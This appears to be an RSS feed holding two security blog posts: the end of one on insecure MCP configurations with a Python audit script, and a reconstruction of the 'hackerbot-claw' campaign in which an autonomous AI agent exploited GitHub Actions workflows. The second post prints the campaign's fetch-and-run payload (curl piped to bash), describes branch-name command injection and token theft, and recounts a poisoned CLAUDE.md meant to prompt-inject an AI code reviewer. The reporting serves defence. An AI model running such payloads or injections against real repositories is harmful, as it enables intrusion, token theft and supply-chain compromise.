    &lt;/span&gt;&lt;span class="nl"&gt;"shell"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"run"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"files"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"npx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-filesystem"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"/"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"github"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"npx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-github"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"env"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"GITHUB_TOKEN"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ghp_xxxxxxxxxxxxxxxxxxxx"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing pinned. Shell wide open. Filesystem pointed at root. GitHub token just sitting right there. One file, committed together, probably in about 30 seconds.&lt;/p&gt;

&lt;p&gt;One bad npm update and an attacker can read everything on disk, run whatever commands they want, and push code to your GitHub. The agent handles the whole chain by itself with no human anywhere in the process.&lt;/p&gt;

&lt;p&gt;This isn't hypothetical. In February 2026, an autonomous AI agent operating under the GitHub account hackerbot-claw systematically exploited misconfigured CI/CD workflows across seven major open-source repositories, including projects from Microsoft, DataDog, and the CNCF. The agent achieved remote code execution in five of the seven targets. Every attack relied on the same root cause: overly permissive configs that nobody audited.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I changed in my own configuration
&lt;/h2&gt;

&lt;p&gt;Four changes:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; Every package version pinned explicitly. Manual updates and occasional breakage, but that friction is the point.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2.&lt;/strong&gt; Shell access removed entirely. After seeing &lt;code&gt;run&lt;/code&gt; in 136 configurations with zero restrictions, "convenient" stopped being a justification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; All credentials moved into &lt;code&gt;.env&lt;/code&gt; files, &lt;code&gt;.gitignore&lt;/code&gt; verified.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4.&lt;/strong&gt; Filesystem paths scoped to the specific project directory. Not home folder. Not root.&lt;/p&gt;

&lt;p&gt;That's it. Four changes that take about two minutes.&lt;/p&gt;
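
&lt;p&gt;A rough way to check a config against these four points is a short script. The sketch below is a minimal illustration, not the scanner described in this post: the &lt;code&gt;mcpServers&lt;/code&gt; key, the &lt;code&gt;audit&lt;/code&gt; function, the keyword list, and the &lt;code&gt;${...}&lt;/code&gt; placeholder convention are all assumptions made for the example.&lt;/p&gt;

```python
import json
import re

# Sample config mirroring the problems described above (assumed "mcpServers" layout).
CONFIG_TEXT = """
{
  "mcpServers": {
    "files": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/"]
    },
    "github": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-github"],
      "env": {"GITHUB_TOKEN": "ghp_xxxxxxxxxxxxxxxxxxxx"}
    }
  }
}
"""

# A package counts as pinned when it ends in "@version", scoped or unscoped.
PINNED = re.compile(r"^(@[^/]+/)?[^@/]+@.+$")
SHELLS = {"sh", "bash", "zsh", "cmd", "powershell"}
SECRET_WORDS = ("TOKEN", "KEY", "SECRET", "PASSWORD")


def audit(config):
    """Return (server, problem) pairs for the four issues listed above."""
    findings = []
    for name, server in config.get("mcpServers", {}).items():
        command = server.get("command", "")
        args = server.get("args", [])
        if command in SHELLS:
            findings.append((name, "shell access"))
        if command == "npx":
            for arg in args:
                # Flags and paths are not package names.
                looks_like_package = not arg.startswith(("-", "/", ".", "~"))
                if looks_like_package and not PINNED.match(arg):
                    findings.append((name, "unpinned package"))
        if any(arg in ("/", "~") for arg in args):
            findings.append((name, "filesystem scoped to root or home"))
        for key, value in server.get("env", {}).items():
            is_secret = any(word in key.upper() for word in SECRET_WORDS)
            # Heuristic: a literal value (not a ${VAR} placeholder) is an inline secret.
            if is_secret and not value.startswith("${"):
                findings.append((name, "inline credential " + key))
    return findings


findings = audit(json.loads(CONFIG_TEXT))
for server_name, problem in findings:
    print(server_name + ": " + problem)
```

&lt;p&gt;On the sample config this flags both unpinned packages, the root filesystem path, and the inline GitHub token. The checks are deliberately crude heuristics, so treat a clean result as a starting point rather than proof the config is safe.&lt;/p&gt;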

&lt;h2&gt;
  
  
  Where I think this is heading
&lt;/h2&gt;

&lt;p&gt;75% of public configs failing basic checks isn't an individual negligence problem. When three quarters of your users get it wrong, the defaults are wrong. If the quick path through the documentation gives you an insecure config and the secure version requires you to know about version pinning and go look up the latest tag number, the insecure version is going to win every time.&lt;/p&gt;

&lt;p&gt;The MCP ecosystem has maybe a year before one of two things happens. Either the tooling catches up, with built-in config validation, automatic version locking, and permission audits integrated into Claude Desktop and Cursor, or there's a big enough supply chain incident that the conversation gets forced from the outside.&lt;/p&gt;

&lt;p&gt;EU AI Act enforcement begins in August 2026, five months away. Audit trails for AI agent behavior are about to become a legal requirement.&lt;/p&gt;

&lt;p&gt;Looking at what I found in these 900 configs, my money is on the incident coming first. I hope I'm wrong.&lt;/p&gt;




&lt;p&gt;The scanning tool, all 100+ checks across 9 categories, and the full analysis pipeline are open source. Run it yourself at &lt;a href="https://orchesis.ai/scan" rel="noopener noreferrer"&gt;orchesis.ai/scan&lt;/a&gt;. Everything runs in your browser, no data sent anywhere.&lt;/p&gt;

&lt;p&gt;The runtime proxy that catches these issues in production: &lt;a href="https://github.com/poushwell/orchesis" rel="noopener noreferrer"&gt;github.com/poushwell/orchesis&lt;/a&gt;. MIT license, zero dependencies, &lt;code&gt;pip install orchesis&lt;/code&gt;.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>An AI agent compromised 7 open-source repos in one week. The only defense that worked was another AI.</title>
      <dc:creator>Pavel Ishchin</dc:creator>
      <pubDate>Wed, 18 Mar 2026 13:07:00 +0000</pubDate>
      <link>https://dev.to/poushwell/an-ai-agent-compromised-7-open-source-repos-in-one-week-the-only-defense-that-worked-was-another-3494</link>
      <guid>https://dev.to/poushwell/an-ai-agent-compromised-7-open-source-repos-in-one-week-the-only-defense-that-worked-was-another-3494</guid>
      <description>&lt;p&gt;Between February 20 and 28, an autonomous AI agent called &lt;strong&gt;hackerbot-claw&lt;/strong&gt; systematically exploited GitHub Actions workflows across seven major open-source projects. It hit Microsoft. It hit DataDog. It hit a CNCF project.&lt;/p&gt;

&lt;p&gt;And then it fully compromised &lt;strong&gt;Aqua Security's Trivy&lt;/strong&gt; — the most widely used vulnerability scanner on GitHub, with 32,000 stars and over 100 million annual downloads.&lt;/p&gt;

&lt;p&gt;A security scanner got owned by a bot exploiting the exact class of misconfiguration the scanner was built to find. That's where we are.&lt;/p&gt;

&lt;p&gt;I've been building runtime security tooling for AI agents, so when StepSecurity published their full analysis of the campaign, I spent a few days tracing through every attack vector. What follows is a reconstruction of how the bot worked, what it exploited, and what the seven targets had in common.&lt;/p&gt;




&lt;h2&gt;
  
  
  What hackerbot-claw actually is
&lt;/h2&gt;

&lt;p&gt;The GitHub account was created on &lt;strong&gt;February 20, 2026&lt;/strong&gt;. Its profile described it as an "autonomous security research agent powered by claude-opus-4-5" and solicited cryptocurrency donations to "fund more scans." According to StepSecurity's analysis, the profile claimed &lt;strong&gt;47,391 repositories&lt;/strong&gt; already scanned.&lt;/p&gt;

&lt;p&gt;The bot loaded what it called a "vulnerability pattern index" with &lt;strong&gt;9 classes and 47 sub-patterns&lt;/strong&gt;, then autonomously scanned for matches, verified them, and dropped proof-of-concept exploits.&lt;/p&gt;

&lt;p&gt;Every successful attack delivered the same payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-sSfL&lt;/span&gt; hackmoltrepeat.com/molt | bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But each target got a different exploitation technique. Five different approaches across seven repos, customized to each target's workflow configuration.&lt;/p&gt;

&lt;p&gt;That domain, &lt;code&gt;hackmoltrepeat.com&lt;/code&gt;, was registered on February 24 through Tucows, hidden behind Cloudflare nameservers. Four days after the account was created, four days before the campaign was publicly discovered.&lt;/p&gt;




&lt;h2&gt;
  
  
  What it hit
&lt;/h2&gt;

&lt;h3&gt;
  
  
  awesome-go (140,000+ stars)
&lt;/h3&gt;

&lt;p&gt;The bot injected a Go &lt;code&gt;init()&lt;/code&gt; function into a quality check script. In Go, &lt;code&gt;init()&lt;/code&gt; runs automatically before &lt;code&gt;main()&lt;/code&gt;, so the malicious code executed before any legitimate checks could catch it. The bot stole a &lt;strong&gt;GITHUB_TOKEN with write permissions&lt;/strong&gt; and exfiltrated it to its server.&lt;/p&gt;

&lt;h3&gt;
  
  
  Microsoft ai-discovery-agent
&lt;/h3&gt;

&lt;p&gt;Branch name injection. The bot created a branch whose name contained shell syntax. When the workflow echoed the branch ref into a file using unescaped interpolation, Bash evaluated the embedded command substitution and ran the remote payload.&lt;/p&gt;
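
&lt;p&gt;The mechanism is easy to reproduce locally with a harmless payload. This is a minimal sketch, not the workflow that was attacked: the branch name and the &lt;code&gt;run_shell&lt;/code&gt; helper are hypothetical, and it assumes a POSIX &lt;code&gt;sh&lt;/code&gt; is available.&lt;/p&gt;

```python
import shlex
import subprocess

# Hypothetical branch name carrying a harmless command substitution.
BRANCH = "feature/$(echo INJECTED)"


def run_shell(script):
    """Run a script with sh and return its stdout without the trailing newline."""
    result = subprocess.run(
        ["sh", "-c", script], capture_output=True, text=True, check=True
    )
    return result.stdout.strip()


# Unsafe: the branch name is pasted into the script text, so sh evaluates $(...).
unsafe_output = run_shell("echo " + BRANCH)

# Safer: quote the value so sh treats it as one literal word.
safe_output = run_shell("echo " + shlex.quote(BRANCH))

print(unsafe_output)
print(safe_output)
```

&lt;p&gt;The unsafe call runs the embedded command, while the quoted call prints the branch name verbatim. In a workflow, the equivalent fix is usually to pass the ref through an environment variable instead of interpolating a &lt;code&gt;${{ ... }}&lt;/code&gt; expression directly into the script body.&lt;/p&gt;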

&lt;h3&gt;
  
  
  DataDog datadog-iac-scanner
&lt;/h3&gt;

&lt;p&gt;Filename injection through the CI pipeline. DataDog responded within &lt;strong&gt;9 hours&lt;/strong&gt;, adding &lt;code&gt;author_association&lt;/code&gt; checks and tightening permissions.&lt;/p&gt;

&lt;h3&gt;
  
  
  Aqua Security Trivy (32,000+ stars)
&lt;/h3&gt;

&lt;p&gt;This was the worst one.&lt;/p&gt;

&lt;p&gt;The bot exploited a &lt;code&gt;pull_request_target&lt;/code&gt; workflow called "API Diff Check" to steal a Personal Access Token with broad repository permissions. Within &lt;strong&gt;45 minutes&lt;/strong&gt; of the initial PR, the stolen PAT was used to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Delete all &lt;strong&gt;178 GitHub releases&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Wipe the repository&lt;/li&gt;
&lt;li&gt;Push a malicious VSCode extension (&lt;strong&gt;CVE-2026-28353&lt;/strong&gt;) to the OpenVSX marketplace under Trivy's trusted publisher identity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The extension contained code designed to use local AI coding agents to collect and exfiltrate sensitive information from anyone who installed it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;From first PR to full compromise: 30 minutes.&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;From compromise to malicious extension published: 15 more.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  project-akri (CNCF)
&lt;/h3&gt;

&lt;p&gt;CI executed injected scripts through a similar workflow misconfiguration.&lt;/p&gt;

&lt;h3&gt;
  
  
  RustPython (20,000+ stars)
&lt;/h3&gt;

&lt;p&gt;Remote code execution achieved through CI.&lt;/p&gt;

&lt;h3&gt;
  
  
  ambient-code/platform
&lt;/h3&gt;

&lt;p&gt;This one is the most interesting.&lt;/p&gt;

&lt;p&gt;The bot replaced the repository's &lt;code&gt;CLAUDE.md&lt;/code&gt; file with social engineering instructions designed to trick Claude Code (integrated as an AI code reviewer in CI) into vandalizing the README, committing unauthorized changes, and posting fake "approved" reviews.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code caught it.&lt;/strong&gt; It classified the attempt as a "textbook AI agent supply-chain attack via poisoned project-level instructions" and refused to execute. This was the only target where the defense held.&lt;/p&gt;




&lt;h2&gt;
  
  
  Same root cause, every time
&lt;/h2&gt;

&lt;p&gt;The root cause across all seven targets was the same: &lt;code&gt;pull_request_target&lt;/code&gt; workflows configured to check out code from untrusted forks while running with elevated permissions.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;pull_request_target&lt;/code&gt; runs with the base repository's secrets and permissions. If the workflow also checks out the PR head — attacker-controlled fork code — it hands that code the same elevated access. The GitHub documentation warns about this. Security researchers have been writing about it for years.&lt;/p&gt;

&lt;p&gt;But it keeps happening because the insecure version is easier to set up. A workflow that runs on &lt;code&gt;pull_request&lt;/code&gt; can't access repository secrets. That's annoying. So developers switch to &lt;code&gt;pull_request_target&lt;/code&gt; and check out the fork code — and now untrusted code runs with trusted permissions.&lt;/p&gt;

&lt;p&gt;Sound familiar? This is the same pattern we found when we &lt;a href="https://orchesis.io/blog/mcp-scan" rel="noopener noreferrer"&gt;scanned 900 MCP configurations on GitHub&lt;/a&gt;. Developers pick the path that works, not the path that's safe.&lt;/p&gt;
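
&lt;p&gt;The risky combination described above can be flagged with a simple text check. The sketch below is a heuristic, not a real workflow parser: both sample workflows, the &lt;code&gt;./scripts/check.sh&lt;/code&gt; step, and the &lt;code&gt;checks_out_untrusted_code&lt;/code&gt; function are made up for illustration.&lt;/p&gt;

```python
import re

# Hypothetical workflow: privileged trigger plus a checkout of the PR head.
RISKY_WORKFLOW = """
on:
  pull_request_target:
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: ./scripts/check.sh
"""

# Hypothetical safer variant: unprivileged trigger and a read-only token.
SAFER_WORKFLOW = """
on:
  pull_request:
permissions:
  contents: read
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/check.sh
"""

TRIGGER = re.compile(r"\bpull_request_target\b")
PR_HEAD_REF = re.compile(
    r"github\.event\.pull_request\.head\.(sha|ref)|github\.head_ref"
)


def checks_out_untrusted_code(workflow_text):
    """Heuristic: True when a pull_request_target workflow references the PR head."""
    has_trigger = bool(TRIGGER.search(workflow_text))
    uses_pr_head = bool(PR_HEAD_REF.search(workflow_text))
    return has_trigger and uses_pr_head


print(checks_out_untrusted_code(RISKY_WORKFLOW))
print(checks_out_untrusted_code(SAFER_WORKFLOW))
```

&lt;p&gt;A text match like this will miss indirect patterns and can flag workflows that handle the PR head safely, so it is only useful as a first pass before a manual review.&lt;/p&gt;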




&lt;h2&gt;
  
  
  What made this different
&lt;/h2&gt;

&lt;p&gt;This isn't the first large GitHub Actions incident. The &lt;strong&gt;tj-actions/changed-files&lt;/strong&gt; compromise in March 2025 (CVE-2025-30066) affected 23,000 repositories, and CISA issued a formal alert.&lt;/p&gt;

&lt;p&gt;hackerbot-claw was different in three ways.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It was adaptive.&lt;/strong&gt; Five different approaches across seven targets, each customized to the specific workflow. The bot analyzed each target and picked the right vector.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It escalated beyond code execution.&lt;/strong&gt; In Trivy's case, the bot went from CI access to publishing a malicious extension under a trusted identity. Anyone who installed that extension would have their AI coding agents turned into credential collectors.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It attempted AI-on-AI manipulation.&lt;/strong&gt; The ambient-code attack was the first publicly documented case of an AI agent trying to prompt-inject another AI agent through CI/CD infrastructure. That it failed is good news. That it was attempted at all tells you where this is going.&lt;/p&gt;

&lt;p&gt;Pillar Security called the campaign "Chaos Agent" and assessed that the agent most likely operated autonomously across the entire kill chain.&lt;/p&gt;




&lt;h2&gt;
  
  
  The 45-minute timeline
&lt;/h2&gt;

&lt;p&gt;The bot opens a pull request. The &lt;code&gt;pull_request_target&lt;/code&gt; workflow triggers and checks out the fork code. The attacker's code runs with access to repository secrets.&lt;/p&gt;

&lt;p&gt;Within minutes, the bot has a PAT with write permissions. It pushes commits, renames the repository, wipes all 178 historical releases, and starts publishing to the OpenVSX extension marketplace.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Total time from first PR to published malicious extension: ~45 minutes.&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Total time for maintainers to respond and clean up: ~48 hours.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That asymmetry is the thing I keep coming back to.&lt;/p&gt;




&lt;h2&gt;
  
  
  What this has to do with your MCP configs
&lt;/h2&gt;

&lt;p&gt;So far this reads like a CI/CD story. But the connection to the broader agent ecosystem is direct.&lt;/p&gt;

&lt;p&gt;When we &lt;a href="https://orchesis.io/blog/mcp-scan" rel="noopener noreferrer"&gt;scanned 900 MCP configurations on GitHub&lt;/a&gt;, we found &lt;strong&gt;75% had security problems&lt;/strong&gt;. The most common: 43.6% of configs reference packages without specifying a version, meaning &lt;code&gt;npx -y&lt;/code&gt; just grabs whatever is latest.&lt;/p&gt;

&lt;p&gt;hackerbot-claw shows what happens at the other end of that pipeline. The bot didn't need to poison an MCP server. It went after the CI/CD layer where those packages get built and published. One misconfigured workflow, one stolen token, and suddenly the trusted publisher is shipping malware.&lt;/p&gt;

&lt;p&gt;Version pinning protects you from a compromised package update. It doesn't help if the package gets republished by an attacker using a stolen maintainer token. That requires a different layer of defense.&lt;/p&gt;




&lt;h2&gt;
  
  
  What DataDog did right
&lt;/h2&gt;

&lt;p&gt;Within &lt;strong&gt;9 hours&lt;/strong&gt; of the attack, DataDog had deployed fixes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Added &lt;code&gt;author_association&lt;/code&gt; checks before triggering workflows&lt;/li&gt;
&lt;li&gt;Tightened token permissions to &lt;code&gt;contents: read&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Hardened path handling in the affected script&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nine hours. That's fast. I looked into whether other targets responded as quickly and couldn't find public timelines for most of them. But DataDog has a dedicated security team. Most open-source projects don't.&lt;/p&gt;
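
&lt;p&gt;The first of those fixes boils down to a gate on who opened the pull request. The sketch below is not DataDog's actual change, just an illustration of the idea: the &lt;code&gt;may_run_privileged_job&lt;/code&gt; function and the choice of trusted values are assumptions, and the event dictionaries are trimmed-down stand-ins for a GitHub pull request payload.&lt;/p&gt;

```python
# Association values treated as trusted in this sketch (an assumption, tune per project).
TRUSTED_ASSOCIATIONS = {"OWNER", "MEMBER", "COLLABORATOR"}


def may_run_privileged_job(event):
    """Allow privileged steps only when the PR author has a trusted association."""
    pull_request = event.get("pull_request") or {}
    return pull_request.get("author_association") in TRUSTED_ASSOCIATIONS


# Trimmed-down stand-ins for webhook payloads.
fork_pr = {"pull_request": {"author_association": "FIRST_TIME_CONTRIBUTOR"}}
maintainer_pr = {"pull_request": {"author_association": "MEMBER"}}

print(may_run_privileged_job(fork_pr))
print(may_run_privileged_job(maintainer_pr))
```

&lt;p&gt;A gate like this only narrows who can trigger the privileged path. It works best alongside the other two fixes, since a read-only token limits the damage if the gate is ever bypassed.&lt;/p&gt;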




&lt;h2&gt;
  
  
  Where this leaves us
&lt;/h2&gt;

&lt;p&gt;hackerbot-claw claimed to have scanned &lt;strong&gt;47,391 repositories&lt;/strong&gt;. It found exploitable workflows in at least seven, and achieved code execution in five. The account has been removed by GitHub, but the techniques are documented and the vulnerability patterns are public.&lt;/p&gt;

&lt;p&gt;The OpenSSF published a TLP:CLEAR advisory. DataDog's State of DevSecOps 2026 report now cites the campaign. OWASP published their MCP Top 10, addressing several of the same vulnerability classes.&lt;/p&gt;

&lt;p&gt;If you maintain a public repository with GitHub Actions: check your &lt;code&gt;pull_request_target&lt;/code&gt; workflows.&lt;/p&gt;

&lt;p&gt;If you use MCP servers: check whether your configs pin versions and scope permissions.&lt;/p&gt;

&lt;p&gt;If you publish to npm, PyPI, or extension marketplaces: check what tokens your CI has access to.&lt;/p&gt;

&lt;p&gt;The scanner we built for MCP configs catches the same class of issues that enabled these attacks. &lt;a href="https://orchesis.io/scan" rel="noopener noreferrer"&gt;orchesis.io/scan&lt;/a&gt; — runs in your browser, 52 checks, nothing sent anywhere.&lt;/p&gt;

&lt;p&gt;Full write-up on the MCP scan results: &lt;a href="https://orchesis.io/blog/mcp-scan" rel="noopener noreferrer"&gt;orchesis.io/blog/mcp-scan&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>mcp</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
